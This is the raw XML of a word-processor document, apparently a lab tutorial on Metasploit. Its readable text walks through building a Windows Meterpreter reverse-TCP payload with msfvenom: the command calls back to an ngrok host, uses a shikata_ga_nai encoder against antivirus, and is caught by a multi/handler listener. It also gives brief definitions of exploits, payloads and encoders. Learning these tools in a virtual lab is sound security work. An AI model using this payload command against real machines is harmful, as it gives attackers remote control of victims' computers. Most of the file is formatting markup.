            <wp:extent cx="6172835" cy="2163445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835" cy="2163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We in generate payload in the right section of the terminal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3 : Use the payload and See the requirement in the options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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="3237230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4 : Now Generate the payload using msfvenom :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>b26a127a3292.ngrok-free.app</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4444 -e x86/shikata_ga_nai -i 5 -o SystemPayload.exe</w:t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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="3402965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"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402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So, our SystemPayload is ready…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5 : Now, For testing the payload we have windows10 setup into our virtual machine… Open virtual machine and Start windows10 System..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Step 6 : We need a Listener for capture the request from the zombie device. For start listener in the msfconsole -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use multi/handler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125095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="3622675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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62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Basically we are exploring Generic/shell_reverse_tcp in this multi/handler.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But we have used windows/meterpreter/reversetcp in the payload. So we need to set the payload to windows/meterpreter/reverse_tcp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for this type the command and set payload -</w:t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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp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7 : Now set up the required lhost and lport in the listener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41275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="4542790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"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542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8 : Start the listener :- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">run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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="1467485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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46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>In the zombie device [windows10] turn off all the antivirus and run the SystemPayload.exe file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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="4690110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="30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690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Step 10 : Run the exe file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then we can access the windows10 device… </w:t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10" w:left="-5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ind w:hanging="0" w:left="-5"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Terminology : 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Exploits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111111"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>These are scripts designed to take advantage of vulnerabilities in systems. Metasploit includes over 1,800 exploits targeting various platforms and services.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Auxiliary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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>These are non-exploit tools used for tasks like scanning, reconnaissance, and brute-forcing. For example, they can scan networks for open ports or test for weak credentials.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Payloads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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>These define the actions to be performed after a successful exploit. Common payloads include reverse shells, back-doors, and data exfiltration tools. Payloads can be single-task or staged for more complex operations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Encoders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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>These help obfuscate payloads to evade detection by antivirus software. Encoders use techniques like encryption and obfuscation to bypass security defenses.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/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w: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  <w:t xml:space="preserve"> -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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>A stealthy, in-memory payload that provides advanced post-exploitation capabilities, such as file transfer, command execution, and system information gathering.</w:t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color w:val="111111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color w:val="111111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p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr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variable"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="OpenSymbol">
    <w:altName w:val="Arial Unicode MS"/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Hack">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Hack">
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="fixed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05"/>
        </w:tabs>
        <w:ind w:left="705" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1065"/>
        </w:tabs>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1425"/>
        </w:tabs>
        <w:ind w:left="1425" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="1785" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2145"/>
        </w:tabs>
        <w:ind w:left="2145" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2505"/>
        </w:tabs>
        <w:ind w:left="2505" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2865"/>
        </w:tabs>
        <w:ind w:left="2865" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3225"/>
        </w:tabs>
        <w:ind w:left="3225" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="3585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05"/>
        </w:tabs>
        <w:ind w:left="705" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1065"/>
        </w:tabs>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1425"/>
        </w:tabs>
        <w:ind w:left="1425" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="1785" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2145"/>
        </w:tabs>
        <w:ind w:left="2145" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2505"/>
        </w:tabs>
        <w:ind w:left="2505" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2865"/>
        </w:tabs>
        <w:ind w:left="2865" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3225"/>
        </w:tabs>
        <w:ind w:left="3225" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="3585" w:hanging="360"/>
      </w:pPr>
      <w:rPr/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36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kern w:val="2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7" w:before="0" w:after="160"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Times New Roman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360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman"/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1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman"/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2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/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3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/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4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman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Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading5Char" w:customStyle="1">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading6Char" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading7Char" w:customStyle="1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading8Char" w:customStyle="1">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading9Char" w:customStyle="1">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman" w:cs="Times New Roman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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color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qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseQuoteChar" w:customStyle="1">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496"/>
      <w:spacing w:val="5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Bengal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Bengal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Bengal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Bengali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  <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman"/>
      <w:spacing w:val="-1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/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roma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qFormat/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040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hyperlink" Target="https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html" TargetMode="External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hyperlink" Target="https://b26a127a3292.ngrok-free.app/" TargetMode="External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Application>LibreOffice/25.2.3.2$Linux_X86_64 LibreOffice_project/520$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>22</Pages>
  <Words>1409</Words>
  <Characters>8456</Characters>
  <CharactersWithSpaces>10346</CharactersWithSpaces>
  <Paragraphs>251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2025-07-11T06:38:00Z</dcterms:created>
  <dc:creator>Istiaq Alam</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-06T15:10:20Z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